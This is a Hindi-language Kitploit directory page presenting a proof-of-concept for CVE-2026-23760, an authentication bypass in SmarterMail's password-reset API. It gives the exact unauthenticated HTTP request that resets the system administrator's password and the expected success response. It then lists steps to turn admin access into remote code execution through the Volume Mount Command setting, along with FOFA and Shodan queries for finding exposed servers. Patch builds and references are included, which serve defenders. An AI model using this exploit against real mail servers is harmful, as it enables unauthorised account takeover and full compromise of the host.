Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
smartermail-CVE-2026-23760-poc — CVE-2026-23760 - SmarterMail में पासवर्ड रीसेट API के माध्यम से एक प्रमाणीकरण बायपास। | Kitploit
उपकरण/GitHubGitHub/maxmnml/smartermail-cve-2026-23760-poc
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubmaxmnml/smartermail-cve-2026-23760-poc

smartermail-CVE-2026-23760-poc

CVE-2026-23760 - SmarterMail में पासवर्ड रीसेट API के माध्यम से एक प्रमाणीकरण बायपास।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
627 महीने पहलेअभी तक समीक्षित नहीं

SmarterMail-CVE-2026-23760-poc

SmarterMail सिस्टम व्यवस्थापक खाते के लिए पासवर्ड रीसेट API के माध्यम से प्रमाणीकरण बाईपास का शोषण करने वाला एक proof-of-concept।

भेद्यता

यह भेद्यता पासवर्ड रीसेट API में प्रमाणीकरण बाईपास के कारण मौजूद है। force-reset-password एंडपॉइंट अनाम अनुरोधों की अनुमति देता है और सिस्टम व्यवस्थापक खातों को रीसेट करते समय मौजूदा पासवर्ड या रीसेट टोकन को सत्यापित करने में विफल रहता है।

  • सिस्टम व्यवस्थापक खाते का अधिग्रहण।
  • SmarterMail की अंतर्निहित कार्यक्षमता के माध्यम से रिमोट कोड निष्पादन का सीधा मार्ग।

प्रभावित संस्करण

  • SmarterTools SmarterMail संस्करण build 9511 से पहले के

Poc (watchtowr labs द्वारा)

PoC इतना सरल है:

root@kitploit:~
POST /api/v1/auth/force-reset-password HTTP/1.1
Host: xxxxxxx:9998
Content-Type: application/json
Content-Length: 145

{"IsSysAdmin":"true",
"OldPassword":"watever",
"Username":"admin",
"NewPassword":"NewPassword123!@#",
"ConfirmPassword": "NewPassword123!@#"}

आपको निम्नलिखित प्रतिक्रिया प्राप्त होनी चाहिए, जो पुष्टि करती है कि पासवर्ड सफलतापूर्वक संशोधित किया गया था:

root@kitploit:~
{
"username":"",
"errorCode":"",
"errorData":"",
"debugInfo":"check1\\r\\ncheck2\\r\\ncheck3\\r\\ncheck4.2\\r\\ncheck5.2\\r\\ncheck6.2\\r\\ncheck7.2\\r\\ncheck8.2\\r\\n",
"success":true,
"resultCode":200
}

एकमात्र शेष आवश्यकता व्यवस्थापक खाते का उपयोगकर्ता नाम जानना है।

ATO से RCE और उससे आगे

एक बार सिस्टम व्यवस्थापक के रूप में प्रमाणित होने के बाद, एक हमलावर यह कर सकता है:

  • Settings -> Volume Mounts पर नेविगेट करें।
  • एक नया volume बनाएं।
  • Volume Mount Command फ़ील्ड में एक मनमाना कमांड प्रदान करें।

वह कमांड अंतर्निहित ऑपरेटिंग सिस्टम द्वारा निष्पादित किया जाता है। उस बिंदु पर, हमलावर ने होस्ट पर पूर्ण रिमोट कोड निष्पादन प्राप्त कर लिया है।

जब कॉन्फ़िगरेशन सहेजा जाता है, तो आपूर्ति किया गया कमांड तुरंत निष्पादित किया जाता है।

स्वचालन

Nuclei-Template:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2026/CVE-2026-23760.yaml

जंगल में

FOFA:

root@kitploit:~
title='SmarterMail'

SHODAN:

root@kitploit:~
html:'SmarterMail'

प्रभाव

एक अनाम रिमोट हमलावर सिस्टम व्यवस्थापक खाते के लिए प्रमाणीकरण को बाईपास कर सकता है और पहुंच प्राप्त कर सकता है। एक बार प्रमाणित होने के बाद, वे होस्ट पर पूर्ण रिमोट कोड निष्पादन पूरा कर सकते हैं।

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N - 9.3:गंभीर

उपचार और शमन

नवीनतम संस्करण में अपडेट करें: https://www.smartertools.com/smartermail/downloads

  • Build 9511 (जनवरी 15, 2026)
  • Build 9518 (जनवरी 22, 2026)

संदर्भ

  • SmarterMail रिलीज़ नोट्स
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760
  • watchTowr ब्लॉग और PoC

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।

टूल डाउनलोड करें